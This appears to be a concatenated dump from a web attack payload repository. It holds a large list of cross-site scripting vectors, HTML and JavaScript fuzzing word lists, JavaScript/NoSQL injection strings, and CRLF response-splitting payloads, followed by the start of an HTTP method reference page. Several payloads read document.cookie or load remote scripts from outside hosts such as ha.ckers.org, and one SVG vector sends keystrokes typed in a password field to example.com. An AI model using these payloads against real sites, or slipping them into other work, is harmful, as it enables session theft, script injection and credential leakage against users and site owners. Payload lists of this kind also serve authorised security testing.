<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
<video poster=javascript:alert(1)//></video>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
<script>({0:#0=alert/#0#/#0#(0)})</script>
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
<?xml-stylesheet href="javascript:alert(1)"?><root/>
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<input onblur=focus() autofocus><input>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
<script src="#">{alert(1)}</script>;1
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
<frameset onload=alert(1)>
<table background="javascript:alert(1)"></table>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1)//">
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
<style><img src="</style><img src=x onerror=alert(1)//">
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
<style>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'foo[a];color:red;';">XXX</div>
<div style="font-family:foo}color=red;">XXX</div>
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<x style="behavior:url(test.sct)">
<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
<video><source onerror="alert(1)">
<video onerror="alert(1)"><source></source></video>
<b <script>alert(1)//</script>0</script></b>
<b><script<b></b><alert(1)</script </b></b>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div style="[a]color[b]:[c]red">XXX</div>
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
<// style=x:expression\28write(1)\29>
<form><button formaction="javascript:alert(1)">X</button>
<event-source src="event.php" onload="alert(1)">
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
<script<{alert(1)}/></script </>
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<object allowscriptaccess="always" data="test.swf"></object>
<style>*{x:expression(write(1))}</style>
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<body oninput=alert(1)><input autofocus>
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
<img src="x` `<script>alert(1)</script>"` `>
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
<img src onerror /" '"= alt=alert(1)//">
<title onpropertychange=alert(1)></title><title title=></title>
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
<x style="background:url('x[a];color:red;/*')">XXX</x>
<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->
<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
<script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
<?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
<svg><style><img/src=x onerror=alert(1)// </b>
<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<object data="javascript:alert(0)">
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
================================================
FILE: attack/html_js_fuzz/html_attributes.txt
================================================
accept
accept-charset
accesskey
action
align
alt
async
autocomplete
autofocus
autoplay
bgcolor
border
challenge
charset
checked
cite
class
color
cols
colspan
content
contenteditable
contextmenu
controls
coords
data
data-userdefined-attribute
datetime
default
defer
dir
dirname
disabled
download
draggable
dropzone
enctype
for
form
formaction
headers
height
hidden
high
href
hreflang
http-equiv
id
ismap
keytype
kind
label
lang
list
loop
low
manifest
max
maxlength
media
method
min
multiple
muted
name
novalidate
onabort
onafterprint
onbeforeprint
onbeforeunload
onblur
oncanplay
oncanplaythrough
onchange
onclick
oncontextmenu
oncopy
oncuechange
oncut
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
ondurationchange
onemptied
onended
onerror
onfocus
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadstart
onmessage
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onoffline
ononline
onpagehide
onpageshow
onpaste
onpause
onplay
onplaying
onpopstate
onprogress
onratechange
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onshow
onstalled
onstorage
onsubmit
onsuspend
ontimeupdate
ontoggle
onunload
onvolumechange
onwaiting
onwheel
open
optimum
pattern
placeholder
poster
preload
readonly
rel
required
reversed
rows
rowspan
sandbox
scope
scoped
selected
shape
size
sizes
span
spellcheck
src
srcdoc
srclang
start
step
style
tabindex
target
title
translate
type
usemap
value
width
wrap
================================================
FILE: attack/html_js_fuzz/html_tags.txt
================================================
!-- --
!DOCTYPE
a
abbr
acronym
address
applet
area
article
aside
audio
b
base
basefont
bdi
bdo
big
blockquote
body
br
button
canvas
caption
center
cite
code
col
colgroup
datalist
dd
del
details
dfn
dialog
dir
div
dl
dt
em
embed
fieldset
figcaption
figure
font
footer
form
frame
frameset
h1
h2
h3
h4
h5
h6
head
header
hr
html
i
iframe
img
input
ins
kbd
keygen
label
legend
li
link
main
map
mark
menu
menuitem
meta
meter
nav
noframes
noscript
object
ol
optgroup
option
output
p
param
pre
progress
q
rp
rt
ruby
s
samp
script
section
select
small
source
span
strike
strong
style
sub
summary
sup
table
tbody
td
textarea
tfoot
th
thead
time
title
tr
track
tt
u
ul
var
video
wbr
================================================
FILE: attack/html_js_fuzz/javascript_events.txt
================================================
onafterprint
onbeforeprint
onbeforeonload
onblur
onerror
onfocus
onhaschange
onload
onmessage
onoffline
ononline
onpagehide
onpageshow
onpopstate
onredo
onresize
onstorage
onundo
onunload
onblur
onchange
oncontextmenu
onfocus
onformchange
onforminput
oninput
oninvalid
onreset
onselect
onsubmit
onkeydown
onkeypress
onkeyup
onclick
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onscroll
onabort
oncanplay
oncanplaythrough
ondurationchange
onemptied
onended
onerror
onloadeddata
onloadedmetadata
onloadedstart
onpause
onplay
onplaying
onprogress
onratechange
onreadystatechange
onseeked
onseeking
onstalled
onsuspend
ontimeupdate
onvolumechange
onwaiting
style
================================================
FILE: attack/html_js_fuzz/js_inject.txt
================================================
function(){ return this.userid}
' function(){ return this.username} or '1'='1
function(){return version()}
function(){return version}
t'; return this; var d='!
" function(){ return this} or '1'='1
t"; return this; var d='!
' || this || '1'=='1
' || this.version || '1'=='1
' || '1'=='1
================================================
FILE: attack/html_js_fuzz/quotationmarks.txt
================================================
'
"
''
""
'"'
"''''"'"
"'"'"''''"
<foo val=“bar” />
<foo val=“bar” />
<foo val=”bar“ />
<foo val=`bar' />
================================================
FILE: attack/http-protocol/README.md
================================================
References:
https://web.archive.org/web/20150426090054/http://ha.ckers.org/response-splitting.html
================================================
FILE: attack/http-protocol/crlf-injection.txt
================================================
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
================================================
FILE: attack/http-protocol/docs.http-method-defs.html
================================================
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 10 (filtered)">
<title>HTTP/1.1 and HTTP/1.0 Method and Field Definitions</title>
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
h2
{margin-right:0cm;
margin-left:0cm;
font-size:18.0pt;
font-family:"Times New Roman";
color:#354278;
font-weight:bold;}
h5
{margin-right:0cm;
margin-left:0cm;
font-size:10.0pt;
font-family:"Times New Roman";
color:#354278;
font-weight:bold;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
p
{margin-right:0cm;
margin-left:0cm;
font-size:12.0pt;
font-family:"Times New Roman";}
p.doctext, li.doctext, div.doctext
{margin-right:0cm;
margin-left:0cm;
font-size:10.5pt;
font-family:"Times New Roman";
color:black;}
span.docemphasis1
{font-style:italic;}
@page Section1
{size:595.3pt 841.9pt;
margin:3.0cm 2.0cm 3.0cm 2.0cm;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=DA link=blue vlink=purple>
<div class=Section1>
<p class=doctext>These tables contain a nearly complete list of all the
methods, requests, and header fields of typical HTTP/1.0 and HTTP/1.1 requests
and responses.</p>
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
style='width:100.0%'>
<tr>
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
<h5 align=center style='text-align:center'><a name=app02table01></a><span
style='font-size:10.5pt;font-family:Arial'> HTTP/1.1 Methods and
Field Definitions</span></h5>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Method</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Request</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Definition</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>GET </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>GET <span class=docemphasis1><Request-URI>?query_string</span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>The GET method is used to retrieve whatever is stored or produced
by the resource located at the specified Request-URI. The GET method can be
used to request files, to invoke server-side scripts, to interact with
server-side CGI programs, and more. When HTML form variables are submitted
with the form action set to GET, the form parameters are encoded in a query
string and submitted to the HTTP server as part of the Request-URI using the
GET request method.</p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>POST </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>POST <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n</p>
<p class=doctext>Content-Length: <span class=docemphasis1><length in
bytes></span>\r\n</p>
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
<p class=doctext><span class=docemphasis1><query_string or other data to
post to Request-URI></span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The POST method is used to submit data to the resource located
at the specified Request-URI. Typically, the resource located at the
specified Request-URI is a server-side script or CGI program designed to
processes form data. When HTML form variables are submitted with the form
action set to POST, the form parameters are encoded and submitted to the HTTP
server as the body of the POST request message. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>HEAD </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>HEAD <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\n</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The HEAD method is identical to the GET method except that
an HTTP 1.1 server should not return a message-body in the response. The
meta-information contained in the HTTP headers in response to a HEAD request
should be identical to the information sent in response to a GET request.
This method can be used for obtaining meta-information about the entity
implied by the request without transferring the entity-body itself. This
method is often used for testing hypertext links for validity, accessibility,
and recent modification."Section 9.4, RFC 2616. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>PUT </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>PUT <span class=docemphasis1><Request-URI></span>
